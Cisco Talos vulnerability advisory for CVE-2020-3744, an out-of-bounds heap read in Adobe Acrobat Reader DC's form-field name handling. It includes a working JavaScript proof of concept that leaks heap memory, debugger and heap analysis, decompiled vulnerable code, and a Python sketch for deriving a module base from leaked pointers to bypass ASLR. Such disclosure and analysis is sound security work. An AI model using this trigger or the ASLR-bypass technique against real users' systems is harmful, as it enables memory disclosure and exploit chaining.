Talos Vulnerability Report

TALOS-2019-0959

Adobe Acrobat Reader DC Javascript Field Name Information Leak

February 11, 2020

CVE Number

CVE-2020-3744

Summary

Specific JavaScript code embedded in a PDF file can lead to an information leak when the document is opened in Adobe Acrobat Reader DC 2019.021.20048. With careful memory manipulation, this can lead to disclosure of sensitive information, which could be abused to bypass mitigations when exploiting another vulnerability. To trigger this vulnerability, the victim would need to open the malicious file or access a malicious web page.

Tested Versions

Adobe Acrobat Reader DC 2019.021.20048

Product URLs

https://get.adobe.com/reader/

CVSSv3 Score

6.8 - CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:H

CWE

CWE-122: Heap-based Buffer Overflow

Details

Adobe Acrobat Reader is one of the most popular and feature-rich PDF readers. It has a big user base, is usually the default PDF reader on systems, and integrates into web browsers as a plugin for rendering PDFs. As such, tricking a user into visiting a malicious web page or sending a specially crafted email attachment can be enough to trigger this vulnerability.

Adobe Acrobat Reader DC supports embedded JavaScript code in the PDF to allow for interactive PDF forms. This gives a potential attacker the ability to precisely control memory layout and exposes additional attack surface. The JavaScript API allows the creation of additional fields, and a field name length calculation error can result in out-of-bounds memory being read. JavaScript code that triggers this vulnerability is as follows:

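// Create a field whose name nearly fills a 0x20000-byte buffer:
// 0x1fff6 "a" characters, a "." separator, then the leaf name "bbbb".
this.addField( Array(0x20000-9).join("a") +  "\." + "bbbb", "radiobutton", 0, [0,0,0,0] );
// Read the name back; it comes with any leaked out-of-bounds bytes.
var s =  getNthFieldName(0);

console.println(s.length);
var sh = "";
try{
    for(var j = 0 ; j < s.length; j++){
        // Skip the expected "a" and "b" characters; keep everything else.
        if(s.charCodeAt(j) == 0x61 || s.charCodeAt(j) == 0x62 ) continue;
        sh += ""+s.charCodeAt(j).toString(16);
    }
    // Print the collected bytes as hex.
    console.println(sh);
}catch(e){}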

The above code creates a PDF form field with a specific, very long name. Then, when the field name is retrieved, out-of-bounds memory is leaked and printed. Note that, in general, this won’t cause a crash, as it just reads out-of-bounds memory. Also, since the length of the printed field name is determined by null termination, no bytes will be leaked if the first byte of leaked memory happens to be null. To observe a crash, PageHeap needs to be enabled. In that case we observe the following:

(1ac8.1e8c): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=52bf0ff6 ebx=0000ffff ecx=0000fff6 edx=0000ffff esi=52be1000 edi=52c49009
eip=66602e8e esp=00d9c964 ebp=00d9c998 iopl=0         nv up ei pl nz na po cy
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010203
VCRUNTIME140!memcpy+0x4e:
66602e8e f3a4            rep movs byte ptr es:[edi],byte ptr [esi]
0:000> dd esi
52be1000  ???????? ???????? ???????? ????????
52be1010  ???????? ???????? ???????? ????????
52be1020  ???????? ???????? ???????? ????????
52be1030  ???????? ???????? ???????? ????????
52be1040  ???????? ???????? ???????? ????????
52be1050  ???????? ???????? ???????? ????????
52be1060  ???????? ???????? ???????? ????????
52be1070  ???????? ???????? ???????? ????????
0:000> dd edi
52c49009  61616161 61616161 61616161 61616161
52c49019  61616161 c0616161 c0c0c0c0 c0c0c0c0
52c49029  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49039  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49049  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49059  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49069  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
52c49079  c0c0c0c0 c0c0c0c0 c0c0c0c0 c0c0c0c0
0:000> ?ecx
Evaluate expression: 65526 = 0000fff6
0:000> kv 5
 # ChildEBP RetAddr  Args to Child              
00 00d9c968 65964583 52c49000 52be0ff7 0000ffff VCRUNTIME140!memcpy+0x4e (FPO: [3,0,2]) (CONV: cdecl) [d:\agent\_work\3\s\src\vctools\crt\vcruntime\src\string\i386\memcpy.asm @ 194] 
WARNING: Stack unwind information not available. Following frames may be wrong.
01 00d9c998 65a13ff9 4c13cfe8 4c09cfe8 0001fff7 AcroForm!DllUnregisterServer+0x26d73
02 00d9c9ec 65a1308a 00d9ca9c 80010000 00000002 AcroForm!DllUnregisterServer+0xd67e9
03 00d9cab4 659a4b22 4a580fe8 00000605 c0010000 AcroForm!DllUnregisterServer+0xd587a
04 00d9cb38 658fa7a0 1d168bd8 4a580fe8 49330ff0 AcroForm!DllUnregisterServer+0x67312
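
As a quick consistency check on the register dump above, the number of bytes copied before the fault can be derived in three independent ways: from the remaining count in ecx, from how far esi advanced, and from how far edi advanced. The following Python sketch uses only values shown in the output; the variable names are ours and are not part of the original analysis.

```python
# Values copied from the WinDbg output above (32-bit process).
ESI = 0x52BE1000      # source pointer at the time of the fault
EDI = 0x52C49009      # destination pointer at the time of the fault
ECX = 0x0000FFF6      # bytes still to be copied by "rep movs"
DST_ARG = 0x52C49000  # first memcpy argument in frame 00
SRC_ARG = 0x52BE0FF7  # second memcpy argument in frame 00
LEN_ARG = 0x0000FFFF  # third memcpy argument in frame 00

copied_by_count = LEN_ARG - ECX   # bytes consumed from the requested length
copied_by_src = ESI - SRC_ARG     # how far the source pointer advanced
copied_by_dst = EDI - DST_ARG     # how far the destination pointer advanced

print(copied_by_count, copied_by_src, copied_by_dst)  # prints: 9 9 9
```

All three agree on 9 bytes: the copy faulted as soon as the source pointer reached 0x52be1000, with 0xfff6 bytes still outstanding.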

The above debugger output shows a crash during a memcpy call. The crash is a read access violation (esi points out of bounds), while edi still points to valid memory. The counter in ecx shows that 0xfff6 bytes remain to be copied. To understand what is going on, we need to take a step back to the calling function, sub_20AA4483:

if ( srcObj->_obj_type_ == eUNICODE )
{
  if ( start_offset1 < pstrend && !(copy_size & 1) )
  {
    realloc_sub_2086737B(destObj, pstrend - start_offset1 + 5);
    *destObj->strbuf = 0xFE;
    destObj->strbuf[1] = 0xFF;
    destObj->current_length = copy_size + 2;
    memcpy(destObj->strbuf + 2, &srcObj->strbuf[start_offset], copy_size);
    memset(&destObj->strbuf[destObj->current_length], 0, 2u);
  }
}
else
{
  realloc_sub_2086737B(destObj, pstrend - start_offset1 + 2);
  destObj->current_length = copy_size;
  memcpy(destObj->strbuf, &srcObj->strbuf[start_offset], copy_size);
  memset(&destObj->strbuf[destObj->current_length], 0, 1u);
}

In the above, we can see that if the string type is not Unicode, the code reallocates the memory buffer in the destination object, copies the source string into it with memcpy, and even properly null-terminates it. Two values influence this vulnerable memcpy call: start_offset and copy_size. Both are derived from this function’s arguments. Taking one step back to the calling function reveals the following simplified code of function sub_20B53CC7:

dotOffset = memchar__sub_20AA38A7(srcObj, '.', 1);
if ( dotOffset == -1 ){...}
else
{
  ...
  sub_20AA4483(dstObj, srcObj, 0, dotOffset);
  ...
  sub_20AA4483(dstObj, srcObj, dotOffset + 1, 0xFFFF);
}

In the above, we see two consecutive calls to function sub_20AA4483, which ends up calling memcpy in a vulnerable way. But first, we see a call to a memchr-like function that searches the source string for a . character. This is significant because the Adobe AcroForms specification tells us that forms and fields can form hierarchy trees, which can be represented by .-delimited names. Function sub_20B53CC7 is actually recursively walking the field name and splitting it at the dots. This matters for the vulnerability because the last call to sub_20AA4483, which processes the leaf part of the field name, receives a correct start offset but a constant size parameter of 0xFFFF. These two arguments end up affecting our variables start_offset (the dot offset plus one) and copy_size (which depends on the bytes copied so far and on the constant 0xFFFF).
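
To make the two calls concrete, the following Python sketch rebuilds the PoC field name and derives the (start offset, size) pairs that the simplified code above would pass to sub_20AA4483. It is only a model: build_poc_name and copy_arguments are hypothetical helper names, str.find stands in for the memchr-like function, and the recursion over multiple dots is not modeled.

```python
def build_poc_name():
    # JavaScript Array(n).join("a") yields n - 1 copies of "a".
    return "a" * (0x20000 - 9 - 1) + "." + "bbbb"

def copy_arguments(name):
    """Return the (start_offset, size) pairs of the two calls shown above."""
    dot_offset = name.find(".")
    if dot_offset == -1:
        return []  # the no-dot path is elided in the original listing
    return [
        (0, dot_offset),            # parent part: everything before the dot
        (dot_offset + 1, 0xFFFF),   # leaf part: constant size, not the real length
    ]

name = build_poc_name()
calls = copy_arguments(name)
leaf_start = calls[1][0]
leaf_length = len(name) - leaf_start  # what the size should have been

print(hex(len(name)), hex(leaf_start), leaf_length)  # prints: 0x1fffb 0x1fff7 4
```

The leaf is only 4 bytes long, yet the requested size is 0xFFFF. The start offset 0x1fff7 matches the third argument visible in the stack traces in this report.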

Additionally, string representation in memory in this case is as follows:

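struct fname_string {
    int obj_type;           /* Unicode vs. ANSI */
    char *strbuff;          /* start of the string data */
    size_t current_length;  /* bytes of the buffer currently in use */
    size_t buffer_size;     /* total size of the allocation */
};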

The object type distinguishes Unicode from ANSI strings, strbuff points to the beginning of the string, buffer_size is the total size of the memory allocation, and current_length represents how much of that buffer is currently used. When we examine one of those objects in memory, we see:

0:000> dd 4c09cfe8 
4c09cfe8  00000001 52bc1000 0001fffb 00020000
4c09cff8  00000000 00000000 ???????? ????????
4c09d008  ???????? ???????? ???????? ????????
4c09d018  ???????? ???????? ???????? ????????
4c09d028  ???????? ???????? ???????? ????????
4c09d038  ???????? ???????? ???????? ????????
4c09d048  ???????? ???????? ???????? ????????
4c09d058  ???????? ???????? ???????? ????????
0:000> dd 52bc1000 
52bc1000  61616161 61616161 61616161 61616161
52bc1010  61616161 61616161 61616161 61616161
52bc1020  61616161 61616161 61616161 61616161
52bc1030  61616161 61616161 61616161 61616161
52bc1040  61616161 61616161 61616161 61616161
52bc1050  61616161 61616161 61616161 61616161
52bc1060  61616161 61616161 61616161 61616161
52bc1070  61616161 61616161 61616161 61616161

For the above example, 0x20000 is the total buffer size, 0x1fffb is the current string length and 0x52bc1000 is the string pointer. We can conclude that for very large strings, Acrobat actually allocates buffers in multiples of 0x10000 bytes, or 64 KB. Note that the 0xFFFF constant is just one byte shy of 0x10000.
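
The dump can be decoded mechanically. The Python sketch below unpacks the first four dwords into the fields of the structure above and checks them against the 64 KB rounding inferred in the text. The rounding helper is our assumption about the growth policy, not recovered code.

```python
import struct

# First four dwords of the "dd 4c09cfe8" output, laid out as little-endian bytes.
raw = struct.pack("<4I", 0x00000001, 0x52BC1000, 0x0001FFFB, 0x00020000)

# Field order follows the fname_string structure described above.
obj_type, strbuff, current_length, buffer_size = struct.unpack("<4I", raw)

GRANULARITY = 0x10000  # 64 KB, as inferred in the text for very large strings

def rounded_capacity(needed):
    """Round up to the next multiple of GRANULARITY (assumed policy)."""
    return -(-needed // GRANULARITY) * GRANULARITY

slack = buffer_size - current_length  # unused bytes at the end of the buffer

print(hex(strbuff), hex(current_length), hex(buffer_size), slack)
# prints: 0x52bc1000 0x1fffb 0x20000 5
```

Only 5 bytes of the allocation are unused, so the string sits almost flush against the end of its buffer.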

Now, getting back to the vulnerable memcpy call, we need to determine where the copy_size value is calculated. This calculation happens in a couple of steps, but the most significant part is in function sub_208720F2, which calculates an offset into the string, taking the string type into account. This function returns the offset that is supposed to limit copy_size, but due to an integer overflow, a bigger value is returned. This essentially results in the constant 0xFFFF being added to the current string offset. In most cases, since large strings are allocated in multiples of 0x10000 bytes, this overflow doesn’t cause a problem, but with specially constructed field names we can force a boundary condition which can lead to up to 0xFFFE bytes being read out of bounds. The string constructed in our PoC does just that:

Array(0x20000-9).join("a") +  "\." + "bbbb"

It makes sure a 0x20000-byte chunk of memory is allocated, but leaves it almost full. If we break just before the memcpy call, we can inspect its parameters:

eax=52128ff7 ebx=0000ffff ecx=65727471 edx=00000040 esi=4b784fe8 edi=4b888fe8
eip=6596457e esp=0053c86c ebp=0053c894 iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00000202
AcroForm!DllUnregisterServer+0x26d6e:
6596457e e8aaa8dbff      call    AcroForm+0x5ee2d (6571ee2d)
0:000> kv 4
 # ChildEBP RetAddr  Args to Child              
WARNING: Stack unwind information not available. Following frames may be wrong.
00 0053c894 65a13ff9 4b784fe8 4b888fe8 0001fff7 AcroForm!DllUnregisterServer+0x26d6e
01 0053c8e8 65a1308a 0053c998 80010000 00000002 AcroForm!DllUnregisterServer+0xd67e9
02 0053c9b0 659a4b22 4915cfe8 00000605 c0010000 AcroForm!DllUnregisterServer+0xd587a
03 0053ca34 658fa7a0 1c20abd8 4915cfe8 4910cff0 AcroForm!DllUnregisterServer+0x67312
0:000> dd esp
0053c86c  52241000 52128ff7 0000ffff 4b784fe8
0053c87c  00010000 0000000d c0010000 4b784fe8
0053c88c  0001fff7 0002fff6 0053c8e8 65a13ff9
0053c89c  4b784fe8 4b888fe8 0001fff7 0000ffff
0053c8ac  c0010000 0000000b 00000056 c0010000
0053c8bc  0000000d 0000000b c0010000 491d4fb0
0053c8cc  491d4fb0 670544f0 00000013 80010000
0053c8dc  0001fff6 4b784fe8 00000014 0053c9b0

The first parameter, the destination buffer, is big enough:

0:000> !heap -p  -a poi(esp)
    address 52241000 found in
    _DPH_HEAP_ROOT @ 761000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                4f1b39f4:         52241000            20000 -         52240000            22000
    6e79abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    6e79b07e verifier!AVrfDebugPageHeapReAllocate+0x0000021e
    77d3316c ntdll!RtlDebugReAllocateHeap+0x0000003c
    77cdf2f2 ntdll!RtlpReAllocateHeapInternal+0x0004c992
    77c92953 ntdll!RtlReAllocateHeap+0x00000043
    77552620 ucrtbase!_realloc_base+0x00000030
    66f5b442 AcroRd32!AcroWinMainSandbox+0x0001db72
    657279ba AcroForm!PlugInMain+0x0000769a
    65727451 AcroForm!PlugInMain+0x00007131
    65964570 AcroForm!DllUnregisterServer+0x00026d60
    65a13ff9 AcroForm!DllUnregisterServer+0x000d67e9
    65a1308a AcroForm!DllUnregisterServer+0x000d587a
    659a4b22 AcroForm!DllUnregisterServer+0x00067312
    658fa7a0 AcroForm!hb_ot_tag_to_language+0x00058b90
0:000> ?poi(esp+4) - 52109000            
Evaluate expression: 131063 = 0001fff7

The second parameter, the source pointer, already points 0x0001fff7 bytes past the start of its buffer, and that buffer is the same size as the destination.

0:000> !heap -p  -a poi(esp+4)
    address 52128ff7 found in
    _DPH_HEAP_ROOT @ 761000
    in busy allocation (  DPH_HEAP_BLOCK:         UserAddr         UserSize -         VirtAddr         VirtSize)
                                4ecb2c30:         52109000            20000 -         52108000            22000
          unknown!fillpattern
    6e79abb0 verifier!AVrfDebugPageHeapAllocate+0x00000240
    6e79b07e verifier!AVrfDebugPageHeapReAllocate+0x0000021e
    77d3316c ntdll!RtlDebugReAllocateHeap+0x0000003c
    77cdf2f2 ntdll!RtlpReAllocateHeapInternal+0x0004c992
    77c92953 ntdll!RtlReAllocateHeap+0x00000043
    77552620 ucrtbase!_realloc_base+0x00000030
    66f5b442 AcroRd32!AcroWinMainSandbox+0x0001db72
    657279ba AcroForm!PlugInMain+0x0000769a
    65727451 AcroForm!PlugInMain+0x00007131
    65727723 AcroForm!PlugInMain+0x00007403
    657276d4 AcroForm!PlugInMain+0x000073b4
    65a12f1f AcroForm!DllUnregisterServer+0x000d570f
    659a4b22 AcroForm!DllUnregisterServer+0x00067312
    658fa7a0 AcroForm!hb_ot_tag_to_language+0x00058b90
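
The two PageHeap records above can be summarized numerically. The following Python sketch computes, for each pointer, its offset into the user block, how many bytes remain readable before the end of that block, and how much reserved space follows it. The describe helper and its field names are hypothetical. Reading the trailing 0x1000 bytes as an inaccessible guard page is consistent with how full PageHeap behaves, but it is our reading of the output.

```python
def describe(user_addr, user_size, virt_addr, virt_size, pointer):
    """Summarize where `pointer` sits inside a PageHeap allocation record."""
    user_end = user_addr + user_size
    virt_end = virt_addr + virt_size
    return {
        "offset": pointer - user_addr,   # position inside the user block
        "in_bounds": user_end - pointer, # bytes readable from pointer onward
        "tail": virt_end - user_end,     # reserved space after the user block
    }

# UserAddr, UserSize, VirtAddr, VirtSize and the pointer from each "!heap -p -a".
dst = describe(0x52241000, 0x20000, 0x52240000, 0x22000, 0x52241000)
src = describe(0x52109000, 0x20000, 0x52108000, 0x22000, 0x52128FF7)

print({k: hex(v) for k, v in dst.items()})
print({k: hex(v) for k, v in src.items()})
```

The destination has the full 0x20000 bytes available, while the source has only 9 bytes left before the end of its block. Any longer read runs into the page that follows, which is why the copy faults under PageHeap.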

And finally, the size of the copy is 0xFFFF.

0:000> ?poi(esp+8)
Evaluate expression: 65535 = 0000ffff

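Executing this memcpy call results in 0xFFF6 bytes being read out of bounds into the destination string: only 9 of the requested 0xFFFF bytes lie inside the source buffer, which matches the remaining count in ecx at the time of the crash. This destination string is later used as part of a field name and can be inspected via JavaScript, thus leaking heap metadata.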
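
The out-of-bounds count follows directly from the values in the debugger output. The Python sketch below computes it for the PoC and for the worst case mentioned earlier, then shows what a bounds-respecting size would look like. The function clamped_size is a hypothetical illustration of a fix, not the vendor's patch.

```python
BUFFER_SIZE = 0x20000     # size of the source allocation
CURRENT_LENGTH = 0x1FFFB  # used bytes of the source string
START_OFFSET = 0x1FFF7    # dot offset + 1 in the PoC
REQUESTED = 0xFFFF        # constant size passed for the leaf component

def out_of_bounds_bytes(start, size, buffer_size):
    """Bytes that a copy of `size` bytes from `start` reads past the buffer."""
    return max(0, start + size - buffer_size)

def clamped_size(start, size, current_length):
    """Hypothetical fix: never copy past the used part of the string."""
    return max(0, min(size, current_length - start))

observed = out_of_bounds_bytes(START_OFFSET, REQUESTED, BUFFER_SIZE)
# Worst case: the copy starts at the very last byte of the buffer.
worst = out_of_bounds_bytes(BUFFER_SIZE - 1, REQUESTED, BUFFER_SIZE)
safe = clamped_size(START_OFFSET, REQUESTED, CURRENT_LENGTH)

print(hex(observed), hex(worst), safe)  # prints: 0xfff6 0xfffe 4
```

With the size clamped to the 4 bytes of "bbbb", the same copy would stay entirely inside the source buffer.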

By carefully controlling the allocations before and after the source string, we can place other sensitive process information in a suitable memory position and then leak it through this vulnerability. This can be used to break ASLR and other mitigations.
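
As a rough illustration of why leaked bytes matter for ASLR, the Python sketch below scans a buffer for a dword whose low 16 bits match a known code offset and subtracts that offset to recover a module base. It relies on Windows images being loaded at 64 KB-aligned bases, which leaves the low 16 bits of in-module addresses unchanged. The leaked bytes are synthetic. The sample pointer is the AcroForm return address from the crash output, and its offset is derived from the "AcroForm+0x5ee2d (6571ee2d)" line; whether such a pointer would actually be adjacent in practice is an assumption.

```python
import struct

def candidate_pointers(leaked, known_offset):
    """Yield (position, value) for dwords whose low 16 bits match known_offset."""
    for position in range(len(leaked) - 3):
        (value,) = struct.unpack_from("<I", leaked, position)
        if value & 0xFFFF == known_offset & 0xFFFF:
            yield position, value

# Synthetic leak: filler bytes around one pointer-like value (hypothetical layout).
leaked = b"\xc0" * 8 + struct.pack("<I", 0x65964583) + b"\xc0" * 4

# Offset of that return address inside AcroForm, from this report's output:
# 0x6571ee2d - 0x5ee2d gives the base, and 0x65964583 - base gives the offset.
KNOWN_OFFSET = 0x65964583 - (0x6571EE2D - 0x5EE2D)

hits = list(candidate_pointers(leaked, KNOWN_OFFSET))
module_base = hits[0][1] - KNOWN_OFFSET

print(hex(KNOWN_OFFSET), hex(module_base))  # prints: 0x2a4583 0x656c0000
```

A real leak would contain many unrelated values, so a match on the low 16 bits is only a candidate and would need further validation.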

Timeline

2019-11-26 - Vendor Disclosure
2020-02-11 - Public Release

Credit

Discovered by Aleksandar Nikolic of Cisco Talos.